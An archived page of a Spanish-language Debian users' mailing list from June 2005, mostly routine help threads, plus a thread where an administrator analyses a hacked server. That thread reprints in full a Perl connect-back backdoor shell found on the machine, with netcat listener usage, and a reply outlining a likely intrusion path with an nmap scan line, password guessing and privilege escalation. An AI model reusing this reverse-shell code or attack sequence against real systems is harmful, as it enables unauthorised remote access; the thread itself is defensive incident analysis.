>>en una base de datos y que a ellos le colocaste en la shell /bin/bash
>>en vez de de /bin/false... el atacante inicia en la busqueda de un
>>exploit
>>para tus demonios, si no lo encuentra entonces iniciara un 
>>ataque de diccionario sobre tus servicios, creo que inicio por
>>el sshd... suponiendo que despues de varias horas de intentar 
>>obtuvo una entrada a tu sistema por medio de un
>>usuariohttp://www.google.com.co/
>>con una muy mala contraseña... luego el atacante ya tiene una shell
>>e inicia en la busqueda de errores internos en busqueda de una 
>>escalada de privilegios, puede buscar programas con SUID o detenerse
>>y observar en securityfocus.com cientos de errores de seguridad
>>que puede contener tu sistema.
>>Suponiendo de despues de varias horas escaneando tu sistema por dentro
>>y teniendo un exploit local consiguio acceso al root... despues de
>>este punto
>>tu maquina ya esta perdida y no hace falta imaginarnos que podria
>>hacer
>>con este poder!!!
>>
>>El script en perl que nombras es muy sencillo.
>>el recive dos parametros que son los siguiente el nombre del host y su
>>ip
>>envia una peticion a dicho puerto de el nombre de la maquina y una
>>shell
>>claro que este script no funciona para nada si antes inicialisaste un
>>puerto
>>con shell... me explico: esto se haria por ejemplo con netcat, este
>>permite
>>crear un demonio que escuche determonado puerto y que cuando el se
>>conecte
>>le sirva un determinado archivo, ejemplo /bin/sh
>>
>>entonces el atacante ejecuta el guion en perl para conectarse a otra
>>maquina objetivo
>>conclusion: utiliso tu maquina como puente para atacar otras redes.
>>claro que podria suponer que es muy novato o un scriptkid ya que
>>destruyo
>>tu sistema... yo permaneceria con una cuenta privilegiada en tu
>>sistema :)
>>
>>Bueno, creo que eso es todo por el momento... si seme ocurre algomas
>>estare escribiendo
>>
>>Saludos.
> 
> 
> 
> 
> uf
> pero si casi parece una conspiracion contra el presidente :o !!!..
Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando
reconstruir lo sucedido".puede no ser lo que paso (en realidad no
creo que haya sido asi XD)

> esos parametros de nmap nos los conocia y me parecieron bastante
> interesantes y asombrosos.. mas bien. preocupante diria yo..
Depende como configures tu firewall...

> que hacer ante un caso como este ?... de que forma se podria prevenir
> este tipo de scaneos en un sistema ?...
Configurando adecuadamente tu firewall para prevenirte contra ese tipo
de escaneos + otras herramientas de deteccion, aunque dudo que lo
necesites, si me lo preguntas...

> que preocupante poder ver este tipo de accion. y ver que no basta con
> las posibles "soluciones de seguridad" que se implementen siempre habra
> algo que logre saltar un sistema =/...
Bueno, es cuestion de reducir posibilidades...como te conteste recien en
otro correo, creo que dejaste las cosas demasiado al azar por decirlo de
algun modo...

> salu2 y en este mismo momento me dispongo a reeleer el manual de
> iptables para mejorar el firewall de aquella empresa...
Puedes leer tambien:
http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html

> consejos ?..
Ahi fue uno...
Otro: olvida la paranoia, que te sirva para el futuro

> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdxZkw12RhFuGy4RAu3lAJoC1v36CjU63uwj6Vq8VkacmMHkigCfaZCd
9M9W04rQ/QSkeAkNjw1uvPA=
=vKmw
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: PostgreSQL GUI

2005-06-10 Por tema Victor Sanchez2

El vie, 10-06-2005 a las 10:50 -0600, Nelson David Sandoval López
escribió:
> Debian Sarge ya como estable posee a PostgreSQL 7.4. y deseo utilizar
> el 8.0.3 pero no se que sources colocar para que extraiga directamente
> ese paquete del sitio de postgresql

No he mirado, pero http://www.apt-get.org/ suele dar buenos resultados
siempre.

-- 
-
/* Linux User #386648  */
www.victorsanchez2.net
-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:
> Hola.
> 
> Bueno, primero que todo mi sentido pesame por tu servidor
> espero que renasca de las cenizas y sea mejor que antes :)
> 
> ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
> en tu servidor.
> 
> el atacante lo primero que realizo fue un scaneo de puertos
> desde alguna maquina remota que tal vez ya estaba comprometida
> o que tal vez era su maquina real o un proxy... no sabemos
> miro los puertos
> 
> nmap -sS -sV -O -v -P0 tuip
> 
> con esto consiguio pasarte por encima de tu firewall si lo tenias y
> obtener 
> una lista de los puertos abiertos de tu servidor junto con
> las versiones de los demonios que ellos corrian.
> 
> ya teniendo esto y observando que tenias el ftp y sshd abiertos 
> la tarea que le sigue es buscar en la pagina en internet o en google 
> buscando correos electronicos por ejemplo [EMAIL PROTECTED]
> ...bueno, teniendo estas cuentas y siendo obtimistas de que 
> en tu servidor creaste usuarios reales en el sistema y no
> en una base de datos y que a ellos le colocaste en la shell /bin/bash
> en vez de de /bin/false... el atacante inicia en la busqueda de un
> exploit
> para tus demonios, si no lo encuentra entonces iniciara un 
> ataque de diccionario sobre tus servicios, creo que inicio por
> el sshd... suponiendo que despues de varias horas de intentar 
> obtuvo una entrada a tu sistema por medio de un
> usuariohttp://www.google.com.co/
> con una muy mala contraseña... luego el atacante ya tiene una shell
> e inicia en la busqueda de errores internos en busqueda de una 
> escalada de privilegios, puede buscar programas con SUID o detenerse
> y observar en securityfocus.com cientos de errores de seguridad
> que puede contener tu sistema.
> Suponiendo de despues de varias horas escaneando tu sistema por dentro
> y teniendo un exploit local consiguio acceso al root... despues de
> este punto
> tu maquina ya esta perdida y no hace falta imaginarnos que podria
> hacer
> con este poder!!!
> 
> El script en perl que nombras es muy sencillo.
> el recive dos parametros que son los siguiente el nombre del host y su
> ip
> envia una peticion a dicho puerto de el nombre de la maquina y una
> shell
> claro que este script no funciona para nada si antes inicialisaste un
> puerto
> con shell... me explico: esto se haria por ejemplo con netcat, este
> permite
> crear un demonio que escuche determonado puerto y que cuando el se
> conecte
> le sirva un determinado archivo, ejemplo /bin/sh
> 
> entonces el atacante ejecuta el guion en perl para conectarse a otra
> maquina objetivo
> conclusion: utiliso tu maquina como puente para atacar otras redes.
> claro que podria suponer que es muy novato o un scriptkid ya que
> destruyo
> tu sistema... yo permaneceria con una cuenta privilegiada en tu
> sistema :)
> 
> Bueno, creo que eso es todo por el momento... si seme ocurre algomas
> estare escribiendo
> 
> Saludos.



uf
pero si casi parece una conspiracion contra el presidente :o !!!..

esos parametros de nmap nos los conocia y me parecieron bastante
interesantes y asombrosos.. mas bien. preocupante diria yo..

que hacer ante un caso como este ?... de que forma se podria prevenir
este tipo de scaneos en un sistema ?...

que preocupante poder ver este tipo de accion. y ver que no basta con
las posibles "soluciones de seguridad" que se implementen siempre habra
algo que logre saltar un sistema =/...

salu2 y en este mismo momento me dispongo a reeleer el manual de
iptables para mejorar el firewall de aquella empresa...

consejos ?..


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: servidor squid

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

root wrote:
> que tal listeros solo para solicitar su ayuda estoy siguiendo un manual
> para levantar un server squid pero a la hora en que lo reinicio me manda
> este error espero alguien me pueda hechar una mano y me diga por donde
> seguir o que buscar de antemano gracias y salu2
> 
> debianX:/etc/init.d# ./squid start
> Starting proxy server: Creating squid spool directory structure
> FATAL: Could not determine fully qualified hostname.  Please set
> 'visible_hostname'
^^^
> 
> Squid Cache (Version 2.5.STABLE9): Terminated abnormally.
> CPU Usage: 0.030 seconds = 0.030 user + 0.000 sys
> Maximum Resident Size: 0 KB
> Page faults with physical i/o: 273
> ./squid: line 184:  3357 Abortado/usr/sbin/squid -z
> FATAL: Could not determine fully qualified hostname.  Please set
> 'visible_hostname'
^^
> 
> Squid Cache (Version 2.5.STABLE9): Terminated abnormally.
> CPU Usage: 0.030 seconds = 0.030 user + 0.000 sys
> Maximum Resident Size: 0 KB
> Page faults with physical i/o: 436
> ./squid: line 184:  3359 Abortadostart-stop-daemon
> --quiet --start --pidfile $PIDFILE --chuid $CHUID --exec $DAEMON --
> $SQUID_ARGS  squid.
> debianX:/etc/init.d#
Bueno, el mensaje es bastante elocuente, no has definido tu
"visible_hostname" en /etc/squid/squid.confcual es la pregunta?
http://www.siliconvalleyccie.com/linux-adv/squid.htm

PD: STFW! RTFM!
- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdn8kw12RhFuGy4RAtltAJ9EQ2Rod+GD3qnmISzUsi7L8vw9uQCfb8b8
4Zm5FqWUYcC3hwMkGmL8AnA=
=pxZA
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Software paradise.

2005-06-10 Por tema Lily


Personalising technology solutions.
http://edaqmvf.7ebmso70mzpemqp.henogenyhb.com




The treacherous are ever distrustful.
Art is born of the observation and investigation of nature.   




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

servidor squid

2005-06-10 Por tema root

que tal listeros solo para solicitar su ayuda estoy siguiendo un manual
para levantar un server squid pero a la hora en que lo reinicio me manda
este error espero alguien me pueda hechar una mano y me diga por donde
seguir o que buscar de antemano gracias y salu2

debianX:/etc/init.d# ./squid start
Starting proxy server: Creating squid spool directory structure
FATAL: Could not determine fully qualified hostname.  Please set
'visible_hostname'

Squid Cache (Version 2.5.STABLE9): Terminated abnormally.
CPU Usage: 0.030 seconds = 0.030 user + 0.000 sys
Maximum Resident Size: 0 KB
Page faults with physical i/o: 273
./squid: line 184:  3357 Abortado/usr/sbin/squid -z
FATAL: Could not determine fully qualified hostname.  Please set
'visible_hostname'

Squid Cache (Version 2.5.STABLE9): Terminated abnormally.
CPU Usage: 0.030 seconds = 0.030 user + 0.000 sys
Maximum Resident Size: 0 KB
Page faults with physical i/o: 436
./squid: line 184:  3359 Abortadostart-stop-daemon
--quiet --start --pidfile $PIDFILE --chuid $CHUID --exec $DAEMON --
$SQUID_ARGS

Re: Opiniones ?... Seguridad/hacking-.

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> El vie, 10-06-2005 a las 13:49 -0300, Ricardo Frydman escribió:
> 
> Nelson wrote:
> 
>>Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
>>crimen contra un servidor que fue hackeado :-(
> 
> Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?
> 
> 
>> Distribucion RedHat 9

Insegura de fábrica. Discontinuada desde hace un año (!)

>> kernel 2.4.20-8

2 Siglos de antiguedad...varios fallos descubiertos, parchado?

>> firewall iptables configuracion basica solo permitia ftp y web
"solo permitia ftp" _solo_ eso ya es mucho...

>> paquetes instalados. la base + los paquetes de apache mysql php y
>> pureftpd oficial compilado.
Actualizado a fecha?.

>> PS: se que esta es una lista debian, pero necesito recaudar datos
>> hacerca del tema. es preocupante lo que sucedio. pido disculpas si
>> molesto a alguien. :-)


En realidad no molestassiempre y cuando ahora le pongas, como Dios
manda, un Debian Sarge y te preocupes un minimo por administrarlo
adecuadamente.
La seguridad no es *solo* instalar un Sistema Operativo que no tenga
(casi) virusConozco servidores Windows infinitamente mas seguros y
mejor administrados que muchos Linux...
*

>>en primera instancia puedo creer que el ataque fue hecho via web ya que
>>la maquina en si.. no tiene contacto fisico alguno con el exterior  a
>>escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
>>chroot).
> 
> Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

>> pure-ftp permite crear usuarios virtuales atados a un grupo existente en
>> la makina sin necesidad de crear el usuario de sistema, solo

https://www.linuxrocket.net/index.cgi?a=MailArchiver&ma=ShowMail&Id=190910


imagino esto al dia
http://sourceforge.net/tracker/?atid=318317&group_id=18317&func=browse

Te puede haber pasado esto:
http://www.linuxforum.com/forums/index.php?showtopic=125174

Como alguien dijo por alli, contraseñas debiles.
Hay muchos flancos por donde puede haber entradocreo que ahora debes
preocuparte por el futuro



>> virtualmente y lo del chroot es que el usuario queda atado netamente a
>> el "home" o directorio que uno establece para su uso al momento de
>> generar el usuario

sé lo que es un chroot..aunque lo estés definiendo de manera
equivocada ;)
http://www.argo.es/~jcea/artic/chroot.htm

> Los paquetes instalados eran todos de repositorios oficiales?
> 
> 
>>el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
>>bases de datos ssh y el equipo se colgo..

que es base de datos ssh?

>>fue una gran sorpresa al darme cuenta que cuando inicie la makina en
>>modo rescate  /var estaba vacio practicamente piendo en un rm
>>-rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
>>atake.. pero buscando en /tmp  encontre algo interezante un archivo
>>llamado _conex.pl_
> 
>>cuyo contenido muestro aqui.
> 
> [Codigo perl de una puerta trasera]
> Lo que entiendo es que te instalaron y ejecutaron un programa para abrir
> una puerta traseracon exito.
> Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o
> lo hizo desde dentro...en tal caso...como entro?
> 
> Saludos
> 
> 
> 
>> eso es lo que me pregunto yo =/..
>> lo mas extraño es.. como llego el exploit ahi. de que forma ya que ni
>> por ssh pudo haber llegado hasta ahi.

Bueno hay otros caminos, de eso ahora no te quedan dudas :P

> 
>> la maquina esta detras de un router con ip privada solo acediendo a el
>> con redireccion de puertos.
> 
> 
> 
>>y me dije que diablos !!!...
>>entonces.. me decidi a preguntar a la lista por si alguien mas o menos
>>entiende este script o podria decir como funciona.. para tomar
>>precauciones en la proxima reinstalacion del servidor. y asi protejer
>>mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
>>mas de seguridad que es tan importante.
>>Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
>>informe claro y Tecnico de lo sucedido aqui.
> 
>>Atentamente
>>Nelson Lopez.
> 
> 
> 
> 
> --
> Ricardo A.Frydman
> Consultor en Tecnología Open Source
> Administrador de Sistemas
> http://www.eureka-linux.com.ar
> 
> 

- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdbjkw12RhFuGy4RAuGfAJ9r5oFrNPjs2wVtR//uN18u9+dg3ACcC0Je
HVevjeNkW7qoF7ZH8r7b7pM=
=DC9G
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

El vie, 10-06-2005 a las 13:49 -0300, Ricardo Frydman escribió:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Nelson wrote:
> > Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
> > crimen contra un servidor que fue hackeado :-(
> Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?

Distribucion RedHat 9
kernel 2.4.20-8
firewall iptables configuracion basica solo permitia ftp y web
paquetes instalados. la base + los paquetes de apache mysql php y
pureftpd oficial compilado.

PS: se que esta es una lista debian, pero necesito recaudar datos
hacerca del tema. es preocupante lo que sucedio. pido disculpas si
molesto a alguien. :-)

> 
> > en primera instancia puedo creer que el ataque fue hecho via web ya que
> > la maquina en si.. no tiene contacto fisico alguno con el exterior  a
> > escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
> > chroot).
> 
> Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

pure-ftp permite crear usuarios virtuales atados a un grupo existente en
la makina sin necesidad de crear el usuario de sistema, solo
virtualmente y lo del chroot es que el usuario queda atado netamente a
el "home" o directorio que uno establece para su uso al momento de
generar el usuario

> 
> Los paquetes instalados eran todos de repositorios oficiales?
> 
> > el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
> > bases de datos ssh y el equipo se colgo..
> > 
> > fue una gran sorpresa al darme cuenta que cuando inicie la makina en
> > modo rescate  /var estaba vacio practicamente piendo en un rm
> > -rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
> > atake.. pero buscando en /tmp  encontre algo interezante un archivo
> > llamado _conex.pl_
> > 
> > cuyo contenido muestro aqui.
> > > 
> 
> [Codigo perl de una puerta trasera]
> Lo que entiendo es que te instalaron y ejecutaron un programa para abrir
> una puerta traseracon exito.
> Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o
> lo hizo desde dentro...en tal caso...como entro?
> 
> Saludos


eso es lo que me pregunto yo =/..
lo mas extraño es.. como llego el exploit ahi. de que forma ya que ni
por ssh pudo haber llegado hasta ahi.

la maquina esta detras de un router con ip privada solo acediendo a el
con redireccion de puertos.


> > y me dije que diablos !!!...
> > entonces.. me decidi a preguntar a la lista por si alguien mas o menos
> > entiende este script o podria decir como funciona.. para tomar
> > precauciones en la proxima reinstalacion del servidor. y asi protejer
> > mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
> > mas de seguridad que es tan importante.
> > Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
> > informe claro y Tecnico de lo sucedido aqui.
> > 
> > Atentamente
> > Nelson Lopez.
> > 
> > 
> 
> 
> - --
> Ricardo A.Frydman
> Consultor en Tecnología Open Source
> Administrador de Sistemas
> http://www.eureka-linux.com.ar
> 
> 
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.1 (GNU/Linux)
> 
> iD8DBQFCqcSzkw12RhFuGy4RAnKHAJ4ujgjwVWJMWRR6CHi7wzHKZ/33dQCePD4P
> 5vvvpYMiqb7AVNXNUepXBBs=
> =RIz4
> -END PGP SIGNATURE-
> 
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Apertura de pdf en Mozilla y familia

2005-06-10 Por tema Josep Ysern

Gracias por tu respuesta, pero el apt-get me dice que no conoce ningún 
mozilla-acrobat; lo curioso es que es el acroread 7.0 el que se abre 
con el mozilla 1.6 que me descargué de su web... pero no con el 
mozilla 1.7.8 de debian... ¿Alguna idea?

Josep

A Divendres 10 Juny 2005 19:07, Iñaki vau escriure:
> Si es el acrobat 7.0 instala el mozilla-acrobat y desinstala el
> acrobat-plugin, y el mozplugger no sé si sirve.


__ 
Renovamos el Correo Yahoo! 
Nuevos servicios, más seguridad 
http://correo.yahoo.es


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Apertura de pdf en Mozilla y familia

2005-06-10 Por tema IÃ±aki

El Viernes, 10 de Junio de 2005 18:06, Josep Ysern escribió:
|| Desde hace poco, el firefox y familia (Mozilla, galeon, epiphany,
|| etc.) no me abren los pdf en línea: los cargan (aparentemente), pero
|| la pantalla queda vacía. Una misma dirección de carga de un pdf es
|| abierta sin problemas por Konqueror -y por un Mozilla 1.6 descargado
|| desde su web- pero no por Mozilla-firefox-galeón-epiphany, etc., de
|| debian. En principio, el mozplugger está instalado y los plugins
|| correspondientes al acroread, etc., también; igualmente, tengo
|| instalados todos los visores de pdf más usuales... ¿Dónde puede estar

Si es el acrobat 7.0 instala el mozilla-acrobat y desinstala el 
acrobat-plugin, y el mozplugger no sé si sirve.

-- 
que a mí ni me va ni me viene... pero por comentar...

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema navickator shadow

Hola.

Bueno, primero que todo mi sentido pesame por tu servidor
espero que renasca de las cenizas y sea mejor que antes :)

ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
en tu servidor.

el atacante lo primero que realizo fue un scaneo de puertos
desde alguna maquina remota que tal vez ya estaba comprometida
o que tal vez era su maquina real o un proxy... no sabemos
miro los puertos

nmap -sS -sV -O -v -P0 tuip

con esto consiguio pasarte por encima de tu firewall si lo tenias y obtener 
una lista de los puertos abiertos de tu servidor junto con
las versiones de los demonios que ellos corrian.

ya teniendo esto y observando que tenias el ftp y sshd abiertos 
la tarea que le sigue es buscar en la pagina en internet o en google 
buscando correos electronicos por ejemplo [EMAIL PROTECTED]
...bueno, teniendo estas cuentas y siendo obtimistas de que 
en tu servidor creaste usuarios reales en el sistema y no
en una base de datos y que a ellos le colocaste en la shell /bin/bash
en vez de de /bin/false... el atacante inicia en la busqueda de un exploit
para tus demonios, si no lo encuentra entonces iniciara un 
ataque de diccionario sobre tus servicios, creo que inicio por
el sshd... suponiendo que despues de varias horas de intentar 
obtuvo una entrada a tu sistema por medio de un usuariohttp://www.google.com.co/
con una muy mala contraseña... luego el atacante ya tiene una shell
e inicia en la busqueda de errores internos en busqueda de una 
escalada de privilegios, puede buscar programas con SUID o detenerse
y observar en securityfocus.com cientos de errores de seguridad
que puede contener tu sistema.
Suponiendo de despues de varias horas escaneando tu sistema por dentro
y teniendo un exploit local consiguio acceso al root... despues de este punto
tu maquina ya esta perdida y no hace falta imaginarnos que podria hacer
con este poder!!!

El script en perl que nombras es muy sencillo.
el recive dos parametros que son los siguiente el nombre del host y su ip
envia una peticion a dicho puerto de el nombre de la maquina y una shell
claro que este script no funciona para nada si antes inicialisaste un puerto
con shell... me explico: esto se haria por ejemplo con netcat, este permite
crear un demonio que escuche determonado puerto y que cuando el se conecte
le sirva un determinado archivo, ejemplo /bin/sh

entonces el atacante ejecuta el guion en perl para conectarse a otra maquina objetivo
conclusion: utiliso tu maquina como puente para atacar otras redes.
claro que podria suponer que es muy novato o un scriptkid ya que destruyo
tu sistema... yo permaneceria con una cuenta privilegiada en tu sistema :)

Bueno, creo que eso es todo por el momento... si seme ocurre algomas estare escribiendo

Saludos.
El día 10/06/05, Nelson <[EMAIL PROTECTED]> escribió:
Hola me dirijo a ustedes ya que necesito intentar rehacer una escena delcrimen contra un servidor que fue hackeado :-(en primera instancia puedo creer que el ataque fue hecho via web ya quela maquina en si.. no tiene contacto fisico alguno con el exterior  a
escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales enchroot).el sintoma fue claro.. de un 2 por 3 se calleron los servicios de webbases de datos ssh y el equipo se colgo..fue una gran sorpresa al darme cuenta que cuando inicie la makina en
modo rescate  /var estaba vacio practicamente piendo en un rm-rf /var :-(...  por ende.. no tengo logs para buscar algun tipo deatake.. pero buscando en /tmp  encontre algo interezante un archivollamado _conex.pl_
cuyo contenido muestro aqui.--C O D E-#!/usr/bin/perl# Remote Connect-Back Backdoor Shell v1.0.# (c)AresU 2004# 1ndonesia Security Team (1st)# AresU[at]bosen.net
# Usage:# 1) Listen port to received shell prompt using NetCat on your toolbox,for example: nc -l -p 9000# 2) Remote Command Execution your BackDoor Shell, for example: perlconnect.pl  
# # The supplied exploit code is not to be used for malicious purpose, butfor educational purpose only. The Authors and 1ndonesian Security TeamWILL NOT responsible for anything happened by the couse of using all
information on these website.# -use Socket;$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia SecurityTeam (1st)\n\n";$cmd= "lpd";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");print STDOUT $pamer;system($system);close(STDIN);close(STDOUT);close(STDERR);--F I N  C O D E-y me dije que diablos !!!...
entonces.. me decidi a preguntar a la lista por si alguien mas o menosentiende este script o podria decir como funciona.. para tomarprecauciones en la proxima reinstalacio

Â¿Alternativa a Nautilus?

2005-06-10 Por tema dayer

Hola a todos, les escribo para preguntarles sobre si alguien conoce
alguna alternativa a Nautilus. Empleo Gnome en Debian/GNU Linux en la
rama inestable. En ocaciones necesito hacer mucho uso del explorador
de archivos y Nautilus me resulta poco práctico, y perdón si ofendo a
alguien amante de Nautilus jeje. Alguna vez he usado KDE, pero me
gusta más Gnome.¿Es posible usar bien Konqueror en Gnome?

Un saludo y gracias.
-- 
-
:: dayer3 at gmail dot com ::
-

Re: Urgente. Se me ha desconfigurado el kernel.

On 6/10/05, Antonio Trujillo Carmona <[EMAIL PROTECTED]> wrote:
> El vie, 10-06-2005 a las 16:09 +0200, Pablo Braulio escribió:
> > Hola a todos.
> > Estaba tratando de configurar user-mode (según el artículo de Todo Linux) y 
> > no
> > que narices ha pasado que se me ha desconfigurado el kernel que tenía
> > compilado por mi (2.6.10).
> > Antes de cagarla mas. ¿Como puedo recuperar mi configuración anterior del
> > kernel?.
> > No se si make oldconfig es lo mas apropiado, pues me hace muchas preguntas 
> > al
> > ejecutar.
> si lo habias hecho al estilo debian en /etc/boot tendras un
> config-[la_version_que_sea] que puedes copiarlo a /usr/src/linux
> como .config (es escondido por empezar con un punto) y habras recuperado
> tu configuración
> --
> Antonio Trujillo Carmona <[EMAIL PROTECTED]>
> 
> 
> 
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 

Consejo gratis:

Despues de compilar un kernel, copia el /usr/src/linux/.config a algún
lado para tener una copia de seguridad de tu configuración de
compilación del kernel.

Si pasa cualquier cosa, sólo tienes que copiar dicho archivo al
directorio del kernel y volver a compilar.

No sería la primera vez que me he cagado en algo sagrado por hacer un
make mrproper antes de copiar el .config T_T

PostgreSQL GUI

2005-06-10 Por tema Nelson David Sandoval López

Debian Sarge ya como estable posee a PostgreSQL 7.4. y deseo utilizar
el 8.0.3 pero no se que sources colocar para que extraiga directamente
ese paquete del sitio de postgresql

Re: Han cambiado los source.lists????

On 6/10/05, Omar Beltran <[EMAIL PROTECTED]> wrote:
> ¿Disculpa la intromisión? pero me podrias
> explicar mejor lo del cambio de nombre de los repositorios
> y como deberia de colocar el apt-setup o donde puedo
> encontrar la info, ya que todavio no comprendo bien la
> transiciones que hace debian entre sus diferentes versiones
> estos, ya lei http://www.debian.org/releases/testing/ pero
> sigo con dudas.
> 
> Mil Gracias mas de uno vera la Luz  ;)
> 
> Omar B
> 
> -Mensaje original-
> De: Fernando [mailto:[EMAIL PROTECTED]
> Enviado el: Jueves 9 de Junio de 2005 12:16 PM
> Para: Lista_Debian_Spanish
> Asunto: Re: Han cambiado los source.lists
> 
> 
> [EMAIL PROTECTED] wrote:
> 
> >Desde hace 1 dia me encuentro con que muchos de los sitios que tengo
> colocados
> >en el source list , me dan erro 404 no encontrado al igual que el de
> >security.debian.org tengo la version testing.
> >Gracias
> >Un saludo.
> >
> >
> >
> >
> Ya se ha contestado en otro hilo. Testing solo tiene soporte de
> seguridad cuando se va a sacar una nueva stable.
> Mira cada repositorio por separado, quizas ahora lo llamen
> etch.(suponiendo que quieras seguir en testing)
> Un saludo.
> 
> 
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
> 
> __
> Correo Yahoo!
> Espacio para todos tus mensajes, antivirus y antispam ¡gratis!
> Regístrate ya - http://correo.yahoo.com.mx/
> 
> 
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 
Hola, 

En tu sources.list defines qué paquetes vas a usar para
actualizar/instalar el software de tu Debian. Tienes que fijarte en la
parte en la que pone woddy/sarge/stable/etch/testing/sid...

Agrosso modo:

- Woody es la antigüa versión estable, tendrá parches de seguridad
durante 12 meses pero son versiones bastante viejas de los paquetes.
Si usas el PC en un entorno de escritorio, te interesa pasar como
mínimo a sarge.

- Sarge es la actual versión estable y dispone de actualizaciones de
seguridad. Si en el sources.list tienes sarge, estarás en la versión
estable de Debian.
Hasta que salga la próxima versión estable de debian - que será dentro
de muuucho tiempo - te da igual poner "sarge" o "stable" en tu
sources.list

- Etch es la actual versión testing de Debian. Te da igual poner etch
o testing en el sources.list. Esta versión suele ser bastante robusta,
aunque no tanto como la estable (obviamente).

- SID. Equivale a tener la última versión de software siempre, pero
"en ocasiones" se rompe. Hay que tener cuidado con los upgrades porque
puede petar algo...aunque no es lo habitual.
Más info y mejor contado en la peich de Debian [1]


Respecto a la linea de security.debian...si estás trabajando en la
versión estable - actualmente sarge - o en woody - antigüa estable -
edita el archivo /etc/apt/sources.list y busca una linea parecida a
deb http://security.debian.org/ testing/updates

y cambiala por lo siguiente:
deb http://security.debian.org/ stable/updates

Sin embargo, si estás en etch o en SID, simplemente comenta la linea
que haga referencia a security.debian.org... y ya está.

Esto es porque la versión estable de Debian tiene actualizaciones de
seguridad - que es precisamente la linea que hay que modificar - pero
las versiones testing y SID no tienen.

Además, se ha detectado un fallo en la primera hormada de imágenes de
sarge [2] que tenían mal la linea que antes mencionaba. De hecho ya ha
salido una segunda versión del CD, cuyo número de referencia es 3.1r0a

Espero haberte aclarado algo...


[1]
http://www.debian.org/releases/

[2]
http://lists.debian.org/debian-devel-announce/2005/06/msg3.html

Re: Opiniones ?... Seguridad/hacking-.

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
> crimen contra un servidor que fue hackeado :-(
Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?

> en primera instancia puedo creer que el ataque fue hecho via web ya que
> la maquina en si.. no tiene contacto fisico alguno con el exterior  a
> escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
